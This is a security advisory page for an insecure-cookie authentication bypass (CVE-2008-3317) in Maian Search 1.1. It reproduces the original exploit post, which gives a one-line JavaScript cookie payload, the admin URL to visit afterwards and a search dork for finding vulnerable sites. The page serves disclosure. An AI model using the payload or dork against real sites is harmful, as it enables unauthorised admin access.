Topic : | Maian Search <= 1.1 Insecure Cookie Handling Vulnerability
|
SecurityAlert : 4042
CVE : CVE-2008-3317
CWE : Not in CWE
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : S.W.A.T.
Published : 28.07.2008
Affected Software : | Maian Search <= 1.1 |
 Advisory Content : -[*]+======================================================================
==========+[*]-
-[*]+ Maian Search <= v1.1 Insecure Cookie Handling Vulnerability
+[*]-
-[*]+======================================================================
==========+[*]-
[*] Discovered By: S.W.A.T.
[*] E-Mail: svvateam[at]yahoo[dot]com
[*] Script Download: http://www.maianscriptworld.co.uk
[*] DORK: Powered by: Maian Search v1.1
[*] Vendor Has Not Been Notified!
[*] DESCRIPTION:
Maian Search suffers from a insecure cookie, the admin panel only checks
if the cookie
exists.
and not the content. so we can easyily craft a cookie and look like a
admin.
[*] Vulnerability:
javascript:document.cookie = "search_cookie=1; path=/";
[*] NOTE/TIP:
after running the javascript, visit "/admin/index.php" to view admin
area.
-[*]+======================================================================
==========+[*]-
-[*]+ Maian Search <= v1.1 Insecure Cookie Handling Vulnerability
+[*]-
-[*]+======================================================================
==========+[*]-
References :
http://securityreason.com/expldownload/1/4330/1 (Exploit)
http://www.securityfocus.com/bid/30211
http://www.milw0rm.com/exploits/6066
http://www.maianscriptworld.co.uk/news.html
http://www.maianscriptworld.co.uk/free-php-scripts/maian-search/development/index.html
http://secunia.com/advisories/31075
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|